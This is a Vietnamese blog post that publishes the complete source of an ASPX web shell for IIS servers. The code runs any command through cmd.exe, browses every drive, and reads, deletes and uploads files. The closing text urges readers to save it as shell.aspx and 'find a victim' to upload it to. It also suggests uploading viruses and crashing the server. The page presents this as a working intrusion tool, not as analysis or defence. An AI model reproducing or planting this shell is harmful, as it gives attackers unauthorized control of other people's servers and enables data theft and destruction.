Trang chủ » Bảo mật » File shell aspx

File shell aspx


Đây là nội dung file shell chạy trên các máy chủ cài IIS

<%@ Page Language="C#" EnableViewState="false" %>
<%@ Import Namespace="System.Web.UI.WebControls" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>

<%
    string outstr = "";
   
    // get pwd
    string dir = Page.MapPath(".") + "/";
    if (Request.QueryString["fdir"] != null)
        dir = Request.QueryString["fdir"] + "/";
    dir = dir.Replace("\\", "/");
    dir = dir.Replace("//", "/");
   
    // build nav for path literal
    string[] dirparts = dir.Split(‘/’);
    string linkwalk = "";   
    foreach (string curpart in dirparts)
    {
        if (curpart.Length == 0)
            continue;
        linkwalk += curpart + "/";
        outstr += string.Format("<a href=’?fdir={0}’>{1}/</a>&nbsp;",
                                    HttpUtility.UrlEncode(linkwalk),
                                    HttpUtility.HtmlEncode(curpart));
    }
    lblPath.Text = outstr;
   
    // create drive list
    outstr = "";
    foreach(DriveInfo curdrive in DriveInfo.GetDrives())
    {
        if (!curdrive.IsReady)
            continue;
        string driveRoot = curdrive.RootDirectory.Name.Replace("\\", "");
        outstr += string.Format("<a href=’?fdir={0}’>{1}</a>&nbsp;",
                                    HttpUtility.UrlEncode(driveRoot),
                                    HttpUtility.HtmlEncode(driveRoot));
    }
    lblDrives.Text = outstr;

    // send file ?
    if ((Request.QueryString["get"] != null) && (Request.QueryString["get"].Length > 0))
    {
        Response.ClearContent();
        Response.WriteFile(Request.QueryString["get"]);
        Response.End();
    }

    // delete file ?
    if ((Request.QueryString["del"] != null) && (Request.QueryString["del"].Length > 0))
        File.Delete(Request.QueryString["del"]);   

    // receive files ?
    if(flUp.HasFile)
    {
        string fileName = flUp.FileName;
        int splitAt = flUp.FileName.LastIndexOfAny(new char[] { ‘/’, ‘\\’ });
        if (splitAt >= 0)
            fileName = flUp.FileName.Substring(splitAt);
        flUp.SaveAs(dir + "/" + fileName);
    }

    // enum directory and generate listing in the right pane
    DirectoryInfo di = new DirectoryInfo(dir);
    outstr = "";
    foreach (DirectoryInfo curdir in di.GetDirectories())
    {
        string fstr = string.Format("<a href=’?fdir={0}’>{1}</a>",
                                    HttpUtility.UrlEncode(dir + "/" + curdir.Name),
                                    HttpUtility.HtmlEncode(curdir.Name));
        outstr += string.Format("<tr><td>{0}</td><td>&lt;DIR&gt;</td><td></td></tr>", fstr);
    }
    foreach (FileInfo curfile in di.GetFiles())
    {
        string fstr = string.Format("<a href=’?get={0}’ target=’_blank’>{1}</a>",
                                    HttpUtility.UrlEncode(dir + "/" + curfile.Name),
                                    HttpUtility.HtmlEncode(curfile.Name));
        string astr = string.Format("<a href=’?fdir={0}&del={1}’>Del</a>",
                                    HttpUtility.UrlEncode(dir),
                                    HttpUtility.UrlEncode(dir + "/" + curfile.Name));
        outstr += string.Format("<tr><td>{0}</td><td>{1:d}</td><td>{2}</td></tr>", fstr, curfile.Length / 1024, astr);
    }
    lblDirOut.Text = outstr;

    // exec cmd ?
    if (txtCmdIn.Text.Length > 0)
    {
        Process p = new Process();
        p.StartInfo.CreateNoWindow = true;
        p.StartInfo.FileName = "cmd.exe";
        p.StartInfo.Arguments = "/c " + txtCmdIn.Text;
        p.StartInfo.UseShellExecute = false;
        p.StartInfo.RedirectStandardOutput = true;
        p.StartInfo.RedirectStandardError = true;
        p.StartInfo.WorkingDirectory = dir;
        p.Start();

        lblCmdOut.Text = p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd();
        txtCmdIn.Text = "";
    }   
%>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
    <title>ASPX Shell</title>
    <style type="text/css">
        * { font-family: Arial; font-size: 12px; }
        body { margin: 0px; }
        pre { font-family: Courier New; background-color: #CCCCCC; }
        h1 { font-size: 16px; background-color: #00AA00; color: #FFFFFF; padding: 5px; }
        h2 { font-size: 14px; background-color: #006600; color: #FFFFFF; padding: 2px; }
        th { text-align: left; background-color: #99CC99; }
        td { background-color: #CCFFCC; }
        pre { margin: 2px; }
    </style>
</head>
<body>
    <h1>ASPX Shell by LT</h1>
    <form id="form1" runat="server">

    <table style="width: 100%; border-width: 0px; padding: 5px;">
        <tr>
            <td style="width: 50%; vertical-align: top;">
                <h2>Shell</h2>               
                <asp:TextBox runat="server" ID="txtCmdIn" Width="300" />
                <asp:Button runat="server" ID="cmdExec" Text="Execute" />
                <pre><asp:Literal runat="server" ID="lblCmdOut" Mode="Encode" /></pre>
            </td>
            <td style="width: 50%; vertical-align: top;">

                <h2>File Browser</h2>
                <p>
                    Drives:<br />
                    <asp:Literal runat="server" ID="lblDrives" Mode="PassThrough" />
                </p>
                <p>
                    Working directory:<br />

                    <b><asp:Literal runat="server" ID="lblPath" Mode="passThrough" /></b>
                </p>
                <table style="width: 100%">
                    <tr>
                        <th>Name</th>
                        <th>Size KB</th>
                        <th style="width: 50px">Actions</th>

                    </tr>
                    <asp:Literal runat="server" ID="lblDirOut" Mode="PassThrough" />
                </table>
                <p>Upload to this directory:<br />
                <asp:FileUpload runat="server" ID="flUp" />
                <asp:Button runat="server" ID="cmdUpload" Text="Upload" />
                </p>
            </td>

        </tr>
    </table>

    </form>
</body>
</html>

Các bạn copy nội dung trên vào notepad rồi save thành file shell.aspx rồi tiến hành tìm victim để up lên Smile

Nội dung của file shell:

– Đọc file và duyệt file trên máy chủ

– Upload file lên máy chủ (có thể up virus hay shell khác ^_^)

– Thực thi command (cmd)

Có thể up con virus từ bài Làm thế nào tạo virus sau đó thực thi câu lệnh để làm treo máy chủ Smile

Chúc vui vẻ ^_^!

Advertisements

One thought on “File shell aspx

Bình luận

Mời bạn điền thông tin vào ô dưới đây hoặc kích vào một biểu tượng để đăng nhập:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Đăng xuất /  Thay đổi )

Google+ photo

Bạn đang bình luận bằng tài khoản Google+ Đăng xuất /  Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Đăng xuất /  Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Đăng xuất /  Thay đổi )

w

Connecting to %s